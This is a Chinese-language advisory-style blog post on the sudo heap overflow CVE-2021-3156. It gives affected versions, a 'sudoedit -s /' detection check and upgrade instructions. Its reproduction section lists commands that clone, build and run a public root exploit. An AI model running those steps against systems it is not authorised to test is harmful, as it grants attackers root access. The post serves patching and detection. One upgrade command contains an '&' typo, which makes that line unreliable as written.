Linux sudo堆溢出漏洞(CVE-2021-3156)


漏洞描述:

2021年01月27日,RedHat官方發布了sudo 緩沖區/棧溢出漏洞的風險通告,普通用戶可以通過利用此漏洞,而無需進行身份驗證,成功獲取root權限。漏洞POC已在互聯網上公開,提醒Linux系統管理員盡快修復。

漏洞級別:高危

受影響的版本:

sudo: 1.8.2 - 1.8.31p2

sudo: 1.9.0 - 1.9.5p1

漏洞復現:

git clone https://github.com/blasty/CVE-2021-3156.git
cd CVE-2021-3156
make
./sudo-hax-me-a-sandwich 1

Kali Linux 復現:

 

ubuntu-20.04.1 復現:

 

 

 

檢測方法:

以非root用戶登錄系統,並運行如下命令:

sudoedit -s /

- 如果響應一個以sudoedit:開頭的報錯,那么表明存在漏洞。

[admin@Q01 ~]$ sudoedit -s /
sudoedit: /: not a regular file

- 如果響應一個以usage:開頭的報錯,那么表明補丁已經生效。

[admin@Q02 ~]$ sudoedit -s /
usage: sudoedit [-AknS] [-C num] [-D directory] [-g group] [-h host] [-p prompt] [-R directory] [-T timeout] [-u user] file ...

修復建議:

方式1、CentOS修復方式:sudo yum -y install sudo 

方式2、下載軟件包安裝,Sudo 1.9.5p2或更新版本

             sudo軟件包下載地址:https://www.sudo.ws/dist/

wget https://www.sudo.ws/dist/sudo-1.9.5p2.tar.gz
tar -zxvf sudo-1.9.5p2.tar.gz
cd sudo-1.9.5p2 &./configure
make && make install

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM